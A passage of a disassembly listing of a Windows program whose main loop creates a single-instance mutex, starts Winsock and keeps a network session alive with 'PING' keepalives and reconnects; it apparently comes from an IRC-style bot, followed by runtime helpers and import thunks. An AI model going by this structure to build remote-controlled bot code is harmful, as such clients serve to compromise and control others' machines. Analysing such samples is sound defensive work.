push offset a08xX08x3x08x08 ; "%08x%x%08x%3x%08x%08x"
lea eax, [ebp+var_115C]
push eax
call sub_416B5E ; sprintf
add esp, 20h
and [ebp+var_1128], 0
jmp short loc_416875
; ---------------------------------------------------------------------------
loc_416868: ; CODE XREF: sub_4167F1:loc_4168BA�j
mov eax, [ebp+var_1128]
inc eax
mov [ebp+var_1128], eax
loc_416875: ; CODE XREF: sub_4167F1+75�j
cmp [ebp+var_1128], 0Ah
jnz short loc_416883
call sub_407148
loc_416883: ; CODE XREF: sub_4167F1+8B�j
push 3E8h
call ds:dword_41709C ; Sleep
lea eax, [ebp+var_115C]
push eax
push 0
push 0
call ds:dword_4170F8 ; CreateMutexA
mov [ebp+var_12F0], eax
cmp [ebp+var_12F0], 0
jz short loc_4168BA
call ds:dword_417064 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_4168BA
jmp short loc_4168BC
; ---------------------------------------------------------------------------
loc_4168BA: ; CODE XREF: sub_4167F1+BB�j
; sub_4167F1+C5�j
jmp short loc_416868
; ---------------------------------------------------------------------------
loc_4168BC: ; CODE XREF: sub_4167F1+C7�j
call sub_403BD3
call sub_405FA3
call sub_40938F
call sub_412FC6
call sub_4102AE
call sub_40E979
push 10h
push offset dword_41DA48
call sub_41055F
pop ecx
pop ecx
push 10h
push offset dword_41DA48
call sub_40ECEB
pop ecx
pop ecx
push 10h
push offset dword_41DA48
call sub_40ED6E
pop ecx
pop ecx
call sub_410422
mov dword_41EC30, eax
call sub_410422
mov dword_41EC34, eax
call sub_410422
mov dword_41EC38, eax
call sub_410422
mov dword_41EC3C, eax
push 104h
lea eax, [ebp+var_1120]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
test eax, eax
jnz short loc_416961
push offset byte_41DE30
push offset dword_41EB2C
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp loc_4169E1
; ---------------------------------------------------------------------------
loc_416961: ; CODE XREF: sub_4167F1+158�j
lea eax, [ebp+var_1120]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_12F4], eax
jmp short loc_416983
; ---------------------------------------------------------------------------
loc_416976: ; CODE XREF: sub_4167F1:loc_4169DF�j
mov eax, [ebp+var_12F4]
dec eax
mov [ebp+var_12F4], eax
loc_416983: ; CODE XREF: sub_4167F1+183�j
cmp [ebp+var_12F4], 0
jnz short loc_41699F
push offset byte_41DE30
push offset dword_41EB2C
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_4169E1
; ---------------------------------------------------------------------------
loc_41699F: ; CODE XREF: sub_4167F1+199�j
mov eax, [ebp+var_12F4]
movsx eax, [ebp+eax+var_1121]
cmp eax, 5Ch
jnz short loc_4169DF
mov eax, [ebp+var_12F4]
lea eax, [ebp+eax+var_1120]
push eax
push offset dword_41EB2C
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset dword_41EB2C
push offset dword_41EC40
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_4169E1
; ---------------------------------------------------------------------------
loc_4169DF: ; CODE XREF: sub_4167F1+1BF�j
jmp short loc_416976
; ---------------------------------------------------------------------------
loc_4169E1: ; CODE XREF: sub_4167F1+16B�j
; sub_4167F1+1AC�j ...
call sub_406E8E
lea eax, [ebp+var_12EC]
push eax
push 202h
call ds:dword_417264 ; WSAStartup
loc_4169F8: ; CODE XREF: sub_4167F1+252�j
; sub_4167F1+2B6�j
push 0
push 0
push 0
call sub_40D366
add esp, 0Ch
call sub_409226
and dword ptr [ebp-1124h], 0
and [ebp+var_101C], 0
loc_416A19: ; CODE XREF: .text:00416AE2�j
mov [ebp+var_4], 1
loc_416A20: ; CODE XREF: sub_4167F1:loc_416A6F�j
; sub_4167F1+2CF�j
push 0EA60h
call sub_40CF25
push eax
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_416A71
cmp [ebp+var_101C], 19h
jnz short loc_416A45
and [ebp+var_4], 0
jmp short loc_4169F8
; ---------------------------------------------------------------------------
loc_416A45: ; CODE XREF: sub_4167F1+24C�j
cmp [ebp+var_101C], 14h
jnz short loc_416A62
call sub_410422
push eax
push offset aPing08x ; "PING :%08X"
call sub_40D6CB
pop ecx
pop ecx
jmp short loc_416A6F
; ---------------------------------------------------------------------------
loc_416A62: ; CODE XREF: sub_4167F1+25B�j
mov eax, [ebp+var_101C]
inc eax
mov [ebp+var_101C], eax
loc_416A6F: ; CODE XREF: sub_4167F1+26F�j
jmp short loc_416A20
; ---------------------------------------------------------------------------
loc_416A71: ; CODE XREF: sub_4167F1+243�j
push 1000h
lea eax, [ebp+var_1018]
push eax
call sub_40CF25
push eax
call sub_4053DC
add esp, 0Ch
mov [ebp-1124h], eax
cmp dword ptr [ebp-1124h], 0
jz short loc_416AA3
cmp dword ptr [ebp-1124h], 0FFFFFFFFh
jnz short loc_416AAC
loc_416AA3: ; CODE XREF: sub_4167F1+2A7�j
and [ebp+var_4], 0
jmp loc_4169F8
; ---------------------------------------------------------------------------
loc_416AAC: ; CODE XREF: sub_4167F1+2B0�j
and [ebp+var_101C], 0
lea eax, [ebp+var_1018]
push eax
call sub_40E943
pop ecx
jmp loc_416A20
sub_4167F1 endp
; ---------------------------------------------------------------------------
loc_416AC5: ; DATA XREF: .rdata:004172A8�o
push offset aLoop ; "loop"
push offset aMain ; "main"
push dword ptr [ebp-14h]
call sub_40332B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_416ADB: ; DATA XREF: .rdata:004172A8�o
mov esp, [ebp-18h]
and dword ptr [ebp-4], 0
jmp loc_416A19
; ---------------------------------------------------------------------------
push offset aEntry ; "entry"
push offset aMain ; "main"
push dword ptr [ebp-14h]
call sub_40332B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
or dword ptr [ebp-4], 0FFFFFFFFh
cmp dword_41DE38, 0
jz short loc_416B1E
push offset dword_41DD54
push offset dword_41DAB4
call sub_40D4AB
pop ecx
pop ecx
loc_416B1E: ; CODE XREF: .text:00416B0B�j
call ds:dword_417254 ; WSACleanup
push 0
call sub_416BFC ; exit
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B3A proc near ; CODE XREF: sub_401000+3C�p
; sub_4020C2+62�p ...
jmp ds:dword_41712C
sub_416B3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B40 proc near ; CODE XREF: sub_401146+7A�p
; sub_4017AA+E�p ...
jmp ds:dword_4171BC
sub_416B40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B46 proc near ; CODE XREF: sub_401244+85�p
; sub_4017AA+22�p ...
jmp ds:dword_4171B8
sub_416B46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B4C proc near ; CODE XREF: sub_401244+25�p
; sub_401244+4DE�p ...
jmp ds:dword_4171B4
sub_416B4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B52 proc near ; CODE XREF: sub_401244+1A�p
; sub_401981+18�p ...
jmp ds:dword_4171B0
sub_416B52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B58 proc near ; CODE XREF: sub_4017AA+5A�p
; sub_4024F3+88�p ...
jmp ds:dword_4171AC
sub_416B58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B5E proc near ; CODE XREF: sub_4018AF+9F�p
; sub_4055E5+231�p ...
jmp ds:dword_4171A8
sub_416B5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B64 proc near ; CODE XREF: sub_4018AF+3B�p
; sub_4018AF+5D�p ...
jmp ds:dword_4171A4
sub_416B64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B6A proc near ; CODE XREF: sub_401981+145�p
; sub_401981+158�p ...
jmp ds:dword_4171A0
sub_416B6A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B70 proc near ; CODE XREF: sub_401D6E+A5�p
; sub_403260+4C�p ...
jmp ds:dword_41719C
sub_416B70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B76 proc near ; CODE XREF: sub_401E38+1AB�p
; sub_4020C2+1A6�p ...
jmp ds:dword_417198
sub_416B76 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B7C proc near ; CODE XREF: sub_401E38+179�p
; sub_402698+24C�p ...
jmp ds:dword_417194
sub_416B7C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B82 proc near ; CODE XREF: sub_401E38+9D�p
; sub_401E38+262�p ...
jmp ds:dword_417190
sub_416B82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B88 proc near ; CODE XREF: sub_401E38+42�p
; sub_4020C2+159�p ...
jmp ds:dword_41718C
sub_416B88 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B90 proc near ; CODE XREF: sub_4020C2+2C1�p
; sub_41102F+94�p ...
jmp ds:dword_417188
sub_416B90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B96 proc near ; CODE XREF: sub_4020C2+198�p
; sub_4020C2+1BC�p ...
jmp ds:dword_417184
sub_416B96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B9C proc near ; CODE XREF: sub_4024F3+26�p
; sub_4024F3+46�p ...
jmp ds:dword_417180
sub_416B9C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BA2 proc near ; CODE XREF: sub_402698+160�p
; sub_40CA29+F6�p ...
jmp ds:dword_41717C
sub_416BA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BA8 proc near ; CODE XREF: sub_402698+CC�p
; sub_402698+110�p ...
jmp ds:dword_417178
sub_416BA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BAE proc near ; CODE XREF: sub_402698+4B�p
; sub_4083AD+3DF�p ...
jmp ds:dword_417174
sub_416BAE endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416BC0 proc near ; CODE XREF: sub_403DF3+8�p
; sub_40546E+8�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_416BE0
loc_416BCC: ; CODE XREF: sub_416BC0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_416BCC
loc_416BE0: ; CODE XREF: sub_416BC0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_416BC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BF0 proc near ; CODE XREF: sub_4041B7+D�p
; sub_4041B7+28�p ...
jmp ds:dword_417170
sub_416BF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BF6 proc near ; CODE XREF: sub_406041+67�p
jmp ds:dword_41716C
sub_416BF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BFC proc near ; CODE XREF: sub_406E8E+2B3�p
; .text:00416B26�p
jmp ds:dword_417168
sub_416BFC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416C10 proc near ; CODE XREF: sub_40821B+61�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_416C31
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_416C81
; ---------------------------------------------------------------------------
loc_416C31: ; CODE XREF: sub_416C10+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_416C3F: ; CODE XREF: sub_416C10+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_416C3F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_416C6A
cmp edx, [esp+4+arg_4]
ja short loc_416C6A
jb short loc_416C72
cmp eax, [esp+4+arg_0]
jbe short loc_416C72
loc_416C6A: ; CODE XREF: sub_416C10+4A�j
; sub_416C10+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_416C72: ; CODE XREF: sub_416C10+52�j
; sub_416C10+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_416C81: ; CODE XREF: sub_416C10+1F�j
pop ebx
retn 10h
sub_416C10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416C90 proc near ; CODE XREF: sub_40821B+30�p
; sub_40821B+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_416CB2
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_416CF3
; ---------------------------------------------------------------------------
loc_416CB2: ; CODE XREF: sub_416C90+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_416CC0: ; CODE XREF: sub_416C90+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_416CC0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_416CEE
cmp edx, [esp+8+arg_4]
ja short loc_416CEE
jb short loc_416CEF
cmp eax, [esp+8+arg_0]
jbe short loc_416CEF
loc_416CEE: ; CODE XREF: sub_416C90+4E�j
; sub_416C90+54�j
dec esi
loc_416CEF: ; CODE XREF: sub_416C90+56�j
; sub_416C90+5C�j
xor edx, edx
mov eax, esi
loc_416CF3: ; CODE XREF: sub_416C90+20�j
pop esi
pop ebx
retn 10h
sub_416C90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416CF8 proc near ; CODE XREF: sub_4088FC+1FA�p
; sub_409226+5C�p ...
jmp ds:dword_417164
sub_416CF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416CFE proc near ; CODE XREF: sub_409226+55�p
; sub_4092A4+55�p ...
jmp ds:dword_417160
sub_416CFE endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416D10 proc near ; CODE XREF: sub_409226+42�p
; sub_4092A4+42�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_416D31
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_416D31: ; CODE XREF: sub_416D10+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_416D4D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_416D4D: ; CODE XREF: sub_416D10+27�j
or eax, eax
jnz short loc_416D69
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_416DAA
; ---------------------------------------------------------------------------
loc_416D69: ; CODE XREF: sub_416D10+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_416D77: ; CODE XREF: sub_416D10+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_416D77
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_416DA5
cmp edx, [esp+0Ch+arg_4]
ja short loc_416DA5
jb short loc_416DA6
cmp eax, [esp+0Ch+arg_0]
jbe short loc_416DA6
loc_416DA5: ; CODE XREF: sub_416D10+85�j
; sub_416D10+8B�j
dec esi
loc_416DA6: ; CODE XREF: sub_416D10+8D�j
; sub_416D10+93�j
xor edx, edx
mov eax, esi
loc_416DAA: ; CODE XREF: sub_416D10+57�j
dec edi
jnz short loc_416DB4
neg edx
neg eax
sbb edx, 0
loc_416DB4: ; CODE XREF: sub_416D10+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_416D10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DBA proc near ; DATA XREF: sub_4093B6+A�o
; sub_4094E6+A�o ...
jmp ds:dword_41715C
sub_416DBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DC0 proc near ; CODE XREF: sub_409479+41�p
; sub_4095A4+162�p
jmp ds:dword_417158
sub_416DC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DC6 proc near ; CODE XREF: sub_4095A4+11B�p
jmp ds:dword_417154
sub_416DC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DCC proc near ; CODE XREF: sub_409CB1+105�p
; sub_409CB1+114�p ...
jmp ds:dword_417150
sub_416DCC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DD2 proc near ; CODE XREF: sub_409CB1+42�p
; sub_409CB1+88�p
jmp ds:dword_41714C
sub_416DD2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DD8 proc near ; CODE XREF: sub_409CB1+1A�p
; sub_409DD0+13B�p
jmp ds:dword_417148
sub_416DD8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DDE proc near ; CODE XREF: sub_40A2D2+13E�p
; sub_40A9CF+1F6�p ...
jmp ds:dword_417144
sub_416DDE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DE4 proc near ; CODE XREF: sub_40A8AD+90�p
jmp ds:dword_417140
sub_416DE4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DEA proc near ; CODE XREF: sub_40A9CF+185C�p
jmp ds:dword_41713C
sub_416DEA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DF0 proc near ; CODE XREF: sub_40D420+47�p
; sub_40D4AB+50�p ...
jmp ds:dword_417138
sub_416DF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DF6 proc near ; CODE XREF: sub_40EF59+6B�p
; sub_40EF59+C1�p
jmp ds:dword_417134
sub_416DF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DFC proc near ; CODE XREF: sub_40F040+52�p
; sub_40F040+A8�p
jmp ds:dword_417130
sub_416DFC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416E02 proc near ; CODE XREF: sub_40F040+1E�p
jmp ds:dword_417128
sub_416E02 endp
; ---------------------------------------------------------------------------
loc_416E08: ; CODE XREF: .text:00416FE2�j
jmp ds:dword_417124
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416E10 proc near ; CODE XREF: sub_414EF4+5�p
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_416E10 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416E30 proc near ; CODE XREF: sub_4048EF+4E�p
; sub_4048EF+2CF�p ...
jmp ds:dword_4171F8
sub_416E30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416E40 proc near ; CODE XREF: sub_414EF4+EA�p
; sub_414EF4+1E2�p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_416EAF
retn 4
sub_416E40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416E4E proc near ; CODE XREF: sub_414EF4+134�p
; sub_414EF4+2D8�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
and [ebp+var_4], 0
test eax, eax
jz short loc_416EA0
mov ecx, [eax]
lea edx, [ebp+arg_4]
push edx
push offset dword_41DDD0
push eax
call dword ptr [ecx]
test eax, eax
jl short loc_416EA0
mov eax, [ebp+arg_4]
push esi
push [ebp+arg_8]
mov ecx, [eax]
push eax
call dword ptr [ecx+0Ch]
mov esi, eax
mov eax, [ebp+arg_4]
push eax
mov ecx, [eax]
call dword ptr [ecx+8]
test esi, esi
pop esi
jnz short loc_416EA0
lea eax, [ebp+var_4]
push eax
push 0
call ds:dword_4171C8
test eax, eax
jz short loc_416EA0
and [ebp+var_4], 0
loc_416EA0: ; CODE XREF: sub_416E4E+D�j
; sub_416E4E+1F�j ...
push [ebp+var_4]
push [ebp+arg_0]
call sub_416EAF
leave
retn 0Ch
sub_416E4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416EAF proc near ; CODE XREF: sub_416E40+6�p
; sub_416E4E+58�p
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
lea ecx, [ebp+var_10]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416ED3
lea eax, [ebp+var_10]
push offset dword_4173B8
push eax
call sub_416FA2 ; _CxxThrowException
sub_416EAF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_416ED3 proc near ; CODE XREF: sub_416EAF+11�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov eax, [esp+arg_0]
push esi
mov esi, ecx
and dword ptr [esi+0Ch], 0
mov [esi+4], eax
mov eax, [esp+4+arg_4]
mov dword ptr [esi], offset off_4172B4
test eax, eax
mov [esi+8], eax
jz short loc_416EFF
cmp [esp+4+arg_8], 0
jz short loc_416EFF
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_416EFF: ; CODE XREF: sub_416ED3+1D�j
; sub_416ED3+24�j
mov eax, esi
pop esi
retn 0Ch
sub_416ED3 endp
; =============== S U B R O U T I N E =======================================
sub_416F05 proc near ; DATA XREF: .rdata:off_4172B4�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_416F4E
test [esp+4+arg_0], 1
jz short loc_416F1B
push esi
call sub_416DCC ; ??3@YAXPAX@Z
pop ecx
loc_416F1B: ; CODE XREF: sub_416F05+D�j
mov eax, esi
pop esi
retn 4
sub_416F05 endp
; ---------------------------------------------------------------------------
mov eax, [esp+4]
push esi
mov esi, ecx
mov ecx, [eax+4]
mov [esi+4], ecx
mov eax, [eax+8]
and dword ptr [esi+0Ch], 0
mov [esi+8], eax
test eax, eax
mov dword ptr [esi], offset off_4172B4
jz short loc_416F48
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_416F48: ; CODE XREF: .text:00416F40�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_416F4E proc near ; CODE XREF: sub_416F05+3�p
; DATA XREF: .rdata:004173BC�o
push esi
mov esi, ecx
mov eax, [esi+8]
mov dword ptr [esi], offset off_4172B4
test eax, eax
jz short loc_416F64
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_416F64: ; CODE XREF: sub_416F4E+E�j
mov esi, [esi+0Ch]
test esi, esi
jz short loc_416F72
push esi
call ds:dword_4170B0 ; LocalFree
loc_416F72: ; CODE XREF: sub_416F4E+1B�j
pop esi
retn
sub_416F4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416F74 proc near ; CODE XREF: sub_401244+120�p
; sub_406E8E+DA�p ...
jmp ds:dword_4171C0
sub_416F74 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416F7A proc near ; CODE XREF: sub_4020C2+113�p
; sub_4038BA+22F�p ...
jmp ds:dword_417114
sub_416F7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416F80 proc near ; CODE XREF: sub_402A32+CC�p
; sub_402A32+2B9�p ...
jmp ds:dword_417118
sub_416F80 endp
; =============== S U B R O U T I N E =======================================
sub_416F86 proc near ; DATA XREF: .rdata:off_4172B4�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_416FA8 ; ??1type_info@@UAE@XZ
test [esp+4+arg_0], 1
jz short loc_416F9C
push esi
call sub_416DCC ; ??3@YAXPAX@Z
pop ecx
loc_416F9C: ; CODE XREF: sub_416F86+D�j
mov eax, esi
pop esi
retn 4
sub_416F86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416FA2 proc near ; CODE XREF: sub_416EAF+1F�p
jmp ds:dword_41711C
sub_416FA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416FA8 proc near ; CODE XREF: sub_416F86+3�p
jmp ds:dword_417120
sub_416FA8 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-0A00h]
call sub_415B3F
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-10h]
call sub_415B3F
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-0DF8h]
call sub_415B3F
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-0E14h]
call sub_415B3F
retn
; ---------------------------------------------------------------------------
loc_416FDD: ; DATA XREF: sub_414EF4�o
mov eax, offset dword_417350
jmp loc_416E08
; ---------------------------------------------------------------------------
align 20h
_text ends
; Section 2. (virtual address 00017000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00017000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_rdata segment para public 'CODE' use32
assume cs:_rdata
;org 417000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_417000 dd 77DD7F3Eh ; DATA XREF: sub_401000+C6�r
dword_417004 dd 77DD5C55h ; DATA XREF: sub_401000+11A�r
; sub_406C51+96�r
dword_417008 dd 77DD22EAh ; DATA XREF: sub_401000+65�r
; sub_406722+184�r ...
dword_41700C dd 77DD23D7h ; DATA XREF: sub_406722+1C3�r
; sub_4083AD+2DD�r ...
dword_417010 dd 77DD59F0h ; DATA XREF: sub_406C51+88�r
dword_417014 dd 77DD590Bh ; DATA XREF: sub_406C51+26�r
dword_417018 dd 77DDACABh ; DATA XREF: sub_4083AD+E6�r
dword_41701C dd 77DE042Eh ; DATA XREF: sub_4102AE+62�r
dword_417020 dd 77DE03D2h ; DATA XREF: sub_4102AE+27�r
; sub_4102AE+37�r ...
dword_417024 dd 77DDEBA2h ; DATA XREF: sub_4102AE+17�r
dword_417028 dd 77DD189Ah ; DATA XREF: sub_401000+136�r
; sub_406722+2F9�r ...
align 10h
dword_417030 dd 77E7C657h ; DATA XREF: sub_4083AD+11E�r
; sub_40D043+20B�r ...
dword_417034 dd 77E7513Ch ; DATA XREF: sub_408342+10�r
; sub_408342+4B�r
dword_417038 dd 77E705C5h ; DATA XREF: sub_406D47+41�r
dword_41703C dd 77E74672h ; DATA XREF: sub_406C51+6F�r
; sub_414EF4+8EE�r
dword_417040 dd 77E705B0h ; DATA XREF: sub_406B81+15�r
dword_417044 dd 77E7A837h ; DATA XREF: sub_406B81+47�r
; sub_406B81+95�r ...
dword_417048 dd 77E73CE2h ; DATA XREF: sub_406B81+6E�r
dword_41704C dd 77E7011Ah ; DATA XREF: sub_406B81+BC�r
dword_417050 dd 77E704FCh ; DATA XREF: sub_406A23+15�r
; sub_406AE7+15�r ...
dword_417054 dd 77E805D8h ; DATA XREF: sub_403BD3+B�r
; sub_403BD3+32�r ...
dword_417058 dd 77E7A5FDh ; DATA XREF: sub_403BD3+22�r
; sub_403BD3+4D�r ...
dword_41705C dd 77E75CB5h ; DATA XREF: sub_40332B+227�r
; sub_407148+18B�r ...
dword_417060 dd 77E6BD13h ; DATA XREF: sub_402A32+EC�r
; sub_406E8E+1FE�r
dword_417064 dd 77F5157Dh ; DATA XREF: sub_402A32+F6�r
; sub_409CB1+CF�r ...
dword_417068 dd 77E79D8Ch ; DATA XREF: sub_401D39+22�r
; sub_406D90+D3�r
dword_41706C dd 77E6CBF9h ; DATA XREF: sub_401981+4F�r
dword_417070 dd 77E7727Ah ; DATA XREF: sub_401981+9E�r
; sub_401981+D7�r
dword_417074 dd 77E79C90h ; DATA XREF: sub_401981+104�r
; sub_401981+111�r
dword_417078 dd 77E65F4Ch ; DATA XREF: sub_4083AD+FA�r
dword_41707C dd 77E61BB8h ; DATA XREF: sub_401981+1C6�r
; sub_406E8E+2A5�r
dword_417080 dd 77EB7624h ; DATA XREF: sub_401981+274�r
